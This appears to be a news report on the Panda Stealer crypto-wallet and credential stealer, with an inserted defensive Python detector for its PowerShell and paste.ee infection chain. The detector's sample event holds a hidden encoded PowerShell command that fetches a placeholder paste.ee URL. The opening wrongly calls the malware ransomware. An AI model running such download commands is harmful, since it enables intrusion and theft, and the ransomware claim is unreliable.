A new malware strain is in circulation that targets digital currency accounts and spreads via phishing emails and Discord channels. Panda Stealer is ransomware that has mainly infected victims in the United States, Germany, Japan, and Australia.
The malware was first identified by security firm Trend Micro. According to a recent blog post by the Tokyo-based company, Panda Stealer is distributed via spam emails posing as business quotation requests to trick unwitting victims into opening malicious Excel files.
According to the security firm, the malware uses two infection chains. In the first, the attackers attach a .XLSM document containing malicious macros; once the victim enables the macros, the malware is installed and the stealer runs.
In the second infection chain, the spam carries a .XLS attachment containing an Excel formula that launches a PowerShell command. This command reaches out to paste.ee, a Pastebin alternative, to fetch a second, encoded PowerShell command. That second command, according to Trend Micro, retrieves further URLs from paste.ee so that fileless payloads can be loaded.
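As an added defensive illustration, not code from the article or from Trend Micro: a small Python detector for the observable traits of that second chain (an Office process spawning PowerShell, an encoded command, and a paste.ee URL hidden inside it), run over constructed process-creation events. The file paths are assumed, and the paste.ee path is a placeholder rather than a real indicator.

```python
import base64
import re
from dataclasses import dataclass

# Office hosts that should not normally launch PowerShell, and the stager host named in the article
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
PASTE_RE = re.compile(r"https?://paste\.ee/\S+", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent_image: str   # Sysmon Event ID 1 style fields
    image: str
    command_line: str

def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' if absent or invalid."""
    if not (m := ENC_RE.search(cmdline)):
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def classify(ev: ProcEvent) -> list[str]:
    """Return the detection reasons that fire for one event (empty list means nothing suspicious)."""
    reasons = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and child in {"powershell.exe", "pwsh.exe"}:
        reasons.append("office-spawned-powershell")
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        reasons.append("encoded-command")
    # The paste.ee URL may sit in the raw command line or only inside the decoded script
    if PASTE_RE.search(ev.command_line + " " + decoded):
        reasons.append("paste.ee-url")
    return reasons

def encode_ps(script: str) -> str:
    """Produce the base64/UTF-16LE form PowerShell expects; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events, not real telemetry; the paste.ee path is a placeholder, not an indicator.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -Command Get-Date"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", PS,
              "powershell.exe -w hidden -enc " + encode_ps("iwr https://paste.ee/r/PLACEHOLDER")),
]
```

Decoding the encoded argument before matching is what makes the paste.ee check work; matching the raw command line alone would miss it.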
“Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum,” the firm stated.
The malware does not only target cryptocurrency accounts, however. It also steals passwords for other applications such as Telegram, NordVPN, Discord, and Steam, collects and exfiltrates browser data including cookies and credentials, and captures screenshots of the infected device.
On VirusTotal, Trend Micro found another 264 files similar to Panda Stealer. These samples used more than 140 command-and-control (C&C) servers and over 10 download sites.
The firm added, “Some of the download sites were from Discord, containing files with names such as ‘build.exe,’ which indicates that threat actors may be using Discord to share the Panda Stealer build.”
According to security researchers, the Panda Stealer activity has been connected to an IP address belonging to virtual private servers leased from Shock Hosting. The hosting firm, however, said that the domain it had allocated to this address has since been disabled.
Panda Stealer is a modified version of Collector Stealer, a malware strain that has been sold on underground markets for just $12. That malware, also known as DC Stealer, is marketed as a high-end information stealer.
Panda Stealer, according to Trend Micro, is linked to Collector Stealer. According to the experts, “Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel. Threat actors may also augment their malware campaigns with specific features from Collector Stealer.”